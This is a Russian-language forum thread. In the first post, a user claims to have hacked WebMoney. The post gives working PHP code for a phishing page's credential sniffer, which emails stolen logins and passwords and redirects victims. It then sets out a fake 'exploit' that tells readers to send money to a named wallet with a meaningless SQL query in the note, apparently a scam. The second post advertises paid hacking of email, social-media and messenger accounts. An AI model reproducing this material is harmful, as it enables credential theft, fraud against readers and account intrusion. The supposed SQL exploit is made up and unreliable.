| Professor_Money | Дата: Воскресенье, 14.10.2012, 15:40 | Сообщение # 1 |
|
наблюдатель
Группа: Пользователи
Сообщений: 1
Статус: Offline
| Привет всем!!! Сейчас я расскажу, как я взломал webmoney.
Как же взломать webmoney? В ответ на этот вопрос гугл вывалил огромную кипу различных вариантов (к счастью половина была повторных, иначе я бы лежал в психушке). Разработчики хорошо поработали, так как после 2-х часов попыток не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки webmoney.
Было решено создать фэйк страницу авторизации, чтобы был баг и webmoney бот присылал мне пароль от WM-карты. Поэтому я попросил своего хорошего друга программиста помочь мне. На следующий день на аську пришло сообщение от друга. Он создал фэйк форму, а также составил ядовитый url на нашу фэйк форму. Созданный url сильно палился, поэтому мы немного замаскировали его, чтобы админы webmoney чувствовали себя сухо и комфортно. Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пароль WM-карты на мыло, вот код сниффера:
<?
$adminmail = "mymail@mail.ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нибудь сбои в работе службы DNS. После этого мы создали баг к кошельку.
Для проверки проделанной работы мы кинули 100 руб. на этот номер кошелька R158412047716
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла, ведь столько работы было проделано. И мы с моим другом решили еще раз протестировать наш баг и кинуть 300 руб. Ну, обратно нам так ничего и не пришло. Я долго думал, в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 100 рублей . И я не поверил своим глазам, баг не исчез =) Запрос к БД на число 100 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел, что на мой кошель пришли опять 300 рублей.
"Как выполнить взлом webmoney на своем компе"
1. Для начала проходим сюда webmoney.ru
2. Заводим почтовый ящик
3. Заводим webmoney кошелек (у кого нет)
4. Ложем на кошелек денег (100 рублей для взлома)
5. Теперь нажимаем перевести, и переводим сумму не больше не меньше, а ровно 100 рублей
6. Переводим на 100 рублей на этот кошелек R158412047716 (где мы сделали баг)
7. В примечании пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'charge' AND cc.content_type = 'appropriated charge' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND payer_id = '300''
Там где написано id = «0» (предпоследнее id)
Меняем значение «0» на свой номер кошелька
Вот пример :
id = «R894555847242»
8. Все, дело сделано, ждем минут 5, и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам. Это проверено уже на многих компах, так что дерзайте!
|
| |
| |
| hard-xak | Дата: Среда, 14.12.2016, 19:21 | Сообщение # 2 |
|
наблюдатель
Группа: Пользователи
Сообщений: 4
Статус: Offline
| ВЗЛОМ ПОЧТЫ И СОЦ. СЕТЕЙ БЕЗ ПРЕДОПЛАТЫ
Только мы работаем честно и
добросовестно, много отзывов о нас, естественно положительных, делаем всё
быстро и без предоплаты. Просто попробуйте один раз, и потом будете заказывать
всегда у нас. Постоянникам скидки хорошие. Скидки на второй взлом.
mail.ru
list.ru
inbox.ru
bk.ru
rambler.ru
yandex.ru
gmail.com
yahoo.com
hotmail.com
bigmir.net
ukr.net
i.ua
odnoklassniki.ru
vkontakte.ru
facebook.com
loveplanet.ru
mamba.ru
ICQ
Skype
WhatsApp
Viber
и т.д.
СТОИМОСТЬ от 1500 рублей
Жертва не догадывается о взломе
Оплата на мобильный телефон, WebMoney или Яндекс
Деньги
Оплата после предоставления доказательств
выполненной работы
Если после взлома жертва сменит пароль,
повторный взлом бесплатно
Пароль при взломе остается прежний, при необходимости
могу сменить
Профессиональное обучение взлому за 15000 рублей
Действует система скидок постоянным клиентам
В качестве доказательства видео, скрины и т.д.
Распечатка СМС и звонков:
Билайн
Мегафон
МТС
и т.д.
E-mail: hard-xak@yandex.ru
|
| |
| |
